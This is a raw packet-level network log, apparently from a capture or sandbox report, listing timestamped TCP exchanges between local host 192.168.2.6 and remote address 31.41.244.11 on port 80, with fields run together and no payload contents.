                                                                                                                                                              Dec 18, 2024 11:47:43.548268080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.548321962 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.548326969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.548363924 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.549709082 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.549755096 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.549803972 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.549840927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.551203012 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.551245928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.551310062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.551357031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.552762032 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.552807093 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.552855968 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.552892923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.554287910 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.554327965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.554377079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.554414988 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.555793047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.555840015 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.555888891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.555927992 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.557190895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.557239056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.557331085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.557369947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.558747053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.558784008 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.558790922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.558815956 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.560276031 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.560336113 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.560395956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.560439110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.561686039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.561731100 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.561783075 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.561825991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.563301086 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.563348055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.563363075 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.563396931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.564661026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.564708948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.564727068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.564766884 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.566503048 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.566541910 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.566651106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.566690922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.567759991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.567804098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.567837954 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.567872047 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.569212914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.569247961 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.569261074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.569284916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.570704937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.570744991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.570816040 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.570849895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.572256088 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.572308064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.572376013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.572419882 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.573754072 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.573798895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.573798895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.573842049 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.575283051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.575334072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.575340986 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.575373888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.576710939 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.576761961 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.576841116 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.576881886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.578231096 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.578273058 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.578344107 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.578382969 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.579771996 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.579823017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.579875946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.579912901 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.581248999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.581296921 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.697133064 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.697169065 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.697278023 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.697560072 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.697596073 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.697612047 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.697670937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.697724104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.698823929 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.698875904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.698932886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.698980093 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.700086117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.700133085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.700217962 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.700258017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.701400042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.701446056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.701479912 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.701520920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.702646017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.702692986 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.702701092 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.702739000 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.703906059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.703955889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.704034090 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.704116106 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.705164909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.705210924 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.705379009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.705421925 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.706418991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.706463099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.706538916 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.706578016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.707602978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.707648039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.707720995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.707760096 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.709069967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.709120989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.709120989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.709167004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.710161924 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.710211039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.710285902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.710333109 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.711375952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.711417913 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.711451054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.711491108 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.712670088 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.712726116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.712733984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.712774038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.713893890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.713944912 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.713989019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.714029074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.715115070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.715169907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.715177059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.715219975 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.716353893 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.716408968 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.716451883 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.716495991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.717560053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.717619896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.717670918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.717715979 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.718807936 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.718852997 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.718883991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.718921900 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.720061064 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.720109940 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.720161915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.720205069 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.721318007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.721375942 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.721427917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.721471071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.722590923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.722635984 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.722692966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.722734928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.723826885 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.723875046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.723972082 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.724020004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.725045919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.725096941 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.725172997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.725222111 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.726325035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.726372957 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.726445913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.726490974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.727507114 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.727562904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.727633953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.727679968 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.728756905 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.728806019 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.728846073 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.728888035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.730001926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.730051041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.730103970 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.730148077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.731240034 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.731287003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.731389046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.731432915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.732487917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.732541084 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.732582092 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.732625008 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.733764887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.733813047 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.733880997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.733923912 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.735009909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.735057116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.735095978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.735131979 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.736227036 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.736274958 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.736332893 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.736373901 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.737622023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.737679005 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.737711906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.737754107 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.738725901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.738773108 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.738822937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.738862991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.739972115 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.740020037 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.740067959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.740108013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.741420031 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.741476059 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.741476059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.741519928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.743026018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.743086100 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.743155003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.743196964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.744079113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.744122028 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.744158983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.744194984 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.745064974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.745107889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.745204926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.745244980 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.746239901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.746284008 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.746362925 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.746407032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.747487068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.747539043 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.747636080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.747680902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.748698950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.748752117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.748758078 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.748799086 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.750011921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.750061989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.750132084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.750174046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.751272917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.751305103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.751334906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.751334906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.752460003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.752506971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.752549887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.752590895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.753705025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.753751040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.753827095 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.753870010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.755160093 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.755199909 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.755268097 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.755304098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.756233931 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.756280899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.756320000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.756356001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.757376909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.757424116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.757479906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.757519007 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.758688927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.758733034 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.758763075 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.758797884 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.759865046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.759910107 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.759969950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.760003090 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.761235952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.761284113 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.761359930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.761399031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.762351990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.762398005 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.888067007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.888173103 CET4987880192.168.2.631.41.244.11
